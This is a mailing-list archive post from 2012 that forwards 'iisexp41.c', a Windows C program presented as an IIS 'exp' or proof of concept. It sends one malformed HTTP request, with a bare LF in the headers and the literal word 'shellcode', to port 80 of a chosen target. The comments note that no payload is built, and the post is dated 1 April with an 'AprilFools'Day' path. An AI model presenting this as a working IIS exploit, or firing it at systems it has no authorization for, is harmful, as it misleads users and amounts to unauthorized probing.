FW: iis bug
From: yuange <yuange1975 () hotmail com>
Date: Sun, 1 Apr 2012 07:51:09 +0000
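/* Mail body (FW: iis bug): "the exp file." -- the attachment iisexp41.c follows. */

/*
 * iisexp41.c ver4.1
 * copy by @yuange1975 2012.4.1
 * "假作真时真亦假" -- "when the false is taken for true, the true too becomes false."
 * http://weibo.com/yuange1975
 * http://twitter.com/yuange75
 * http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
 *
 * What this program does (Windows / Winsock only):
 *   1. WSAStartup, then open one blocking TCP socket to argv[1] on port 80;
 *   2. send a single fixed HTTP request (AprilFoolsDay below) and print the
 *      number of bytes written;
 *   3. close the socket and WSACleanup.
 *
 * The only unusual thing about the request is that its header block contains a
 * bare LF ("a=b\nc:shellcode") instead of CRLF between two header lines.  No
 * exploit payload is constructed: build_crash_package() is commented out and
 * the word "shellcode" is just the literal text of a header value.  From a
 * defender's point of view this is a malformed-request sender; a server that
 * rejects bare-LF header lines (as RFC 7230 permits) simply answers 400.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>          /* strlen, memcpy */
#include <winsock2.h>        /* must precede windows.h */
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>        /* getaddrinfo, freeaddrinfo */
#include <process.h>         /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "Mswsock")

/* The request sent verbatim.  Note the bare "\n" after "a=b". */
static const char AprilFoolsDay[] =
    "GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

/*
 * Turn a target string into an IPv4 address in network byte order.
 *
 * name: dotted-quad literal or a host name.  A literal is converted with
 *       inet_addr() and needs no resolver round-trip; anything else is resolved
 *       with getaddrinfo() restricted to AF_INET, because the caller copies the
 *       result straight into a struct sockaddr_in.
 *
 * Returns the address (network byte order) or 0 when the argument is empty,
 * unparsable, unresolvable, or would map to INADDR_ANY / INADDR_NONE.  The
 * caller must therefore treat 0 as "no usable address".
 */
static unsigned int maybe_lookup_host(const char *name)
{
    unsigned long ulAddr = INADDR_NONE;
    struct addrinfo hints = {0};
    struct addrinfo *res = NULL;
    struct addrinfo *ai = NULL;
    unsigned int result = 0;

    if (name == NULL || name[0] == '\0') {
        return 0;
    }

    /* Don't bother resolving raw IP addresses, naturally. */
    ulAddr = inet_addr(name);
    if (ulAddr != INADDR_NONE && ulAddr != INADDR_ANY) {
        return (unsigned int)ulAddr;
    }

    /* Not a literal: resolve it, IPv4 only. */
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(name, NULL, &hints, &res) != 0 || res == NULL) {
        return 0;
    }
    for (ai = res; ai != NULL; ai = ai->ai_next) {
        if (ai->ai_family == AF_INET &&
            ai->ai_addrlen >= sizeof(struct sockaddr_in)) {
            const struct sockaddr_in *sa = (const struct sockaddr_in *)ai->ai_addr;
            memcpy(&result, &sa->sin_addr, sizeof result);
            break;
        }
    }
    freeaddrinfo(res);
    return result;
}

/*
 * Connect to hostname:port over TCP and send the AprilFoolsDay request once.
 *
 * hostname: IPv4 literal or host name (see maybe_lookup_host).
 * port:     TCP port; must fit in 16 bits.
 *
 * Returns 0 when the request was handed to send() successfully, -1 on any
 * failure (unresolvable target, bad port, socket/connect/send error).  Every
 * failure path after socket creation closes the socket.  Progress and errors
 * are printed to stdout, matching the original tool's output format.
 */
int do_exp(const char *hostname, unsigned int port)
{
    SOCKET sock = INVALID_SOCKET;
    struct sockaddr_in sin = {0};       /* zero sin_zero too, not just the used fields */
    unsigned int addr = 0;
    int write_res = 0;
    const char *crash_buf = NULL;
    int crash_buflen = 0;

    /* Resolve first so an unusable target does not cost a socket. */
    addr = maybe_lookup_host(hostname);
    if (addr == 0) {
        printf_s("could not resolve target \"%s\"\n", hostname ? hostname : "");
        return -1;
    }
    /* htons() would silently truncate anything wider than 16 bits. */
    if (port == 0 || port > 0xFFFFu) {
        printf_s("invalid port %u\n", port);
        return -1;
    }

    /* create SOCKET */
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0 /*WSA_FLAG_OVERLAPPED*/);
    if (sock == INVALID_SOCKET) {
        printf_s("WSASocket function failed with error = %d\n", WSAGetLastError());
        return -1;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons((unsigned short)port);
    memcpy(&sin.sin_addr, &addr, sizeof sin.sin_addr);

    /* connect */
    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        /* Save the code before closesocket()/printf() can overwrite it. */
        int err = WSAGetLastError();
        /* The socket is never switched to non-blocking mode here, so this
         * branch is not expected to trigger; it is kept from the original. */
        if (err != WSAEWOULDBLOCK) {
            closesocket(sock);
            printf_s("connect function failed with error: %d\n", err);
            return -1;
        }
    }
    printf("[*] connected to %s:%u\n", hostname, port);

    /* build_crash_package(&crash_buf, &crash_buflen); -- never implemented here */
    crash_buf = AprilFoolsDay;
    crash_buflen = (int)strlen(AprilFoolsDay);

    /* send data to remote target */
    write_res = send(sock, crash_buf, crash_buflen, 0);
    if (write_res == SOCKET_ERROR) {
        int err = WSAGetLastError();
        closesocket(sock);
        printf_s("send function failed with error: %d\n", err);
        return -1;
    }
    printf("[*] send %d bytes\n", write_res);

    closesocket(sock);
    return 0;
}

/*
 * Entry point: iisexp41 <target_ip>
 *
 * Initialises Winsock 2.2, calls do_exp(argv[1], 80), tears Winsock down and
 * exits 0 on success, 1 if do_exp failed, -1 if WSAStartup failed.  Prints the
 * usage line and exits 0 when no target is given.
 */
int main(int argc, const char **argv)
{
    int iResult;
    int rc;
    const char *target_ip = NULL;
    WSADATA wsaData;

    /* Check argc before touching argv[1]: with argc == 0 the slot does not exist. */
    if (argc < 2 || argv[1] == NULL || argv[1][0] == '\0') {
        printf_s("usage: <target_ip>\n");
        return 0;
    }
    target_ip = argv[1];

    /* Initialize Winsock */
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        printf_s("WSAStartup failed: %d\n", iResult);
        return -1;
    }

    rc = do_exp(target_ip, 80);

    /* clean - win socket */
    WSACleanup();
    return rc == 0 ? 0 : 1;
}

/* ---- Forwarded message, quoted verbatim from the archive page ----
From: yuange1975 () hotmail com
To: full-disclosure () lists grok org uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000

iis new bug:
http://weibo.com/yuange1975

poc:
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
*/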
Attachment:
iisexp41.c
Description: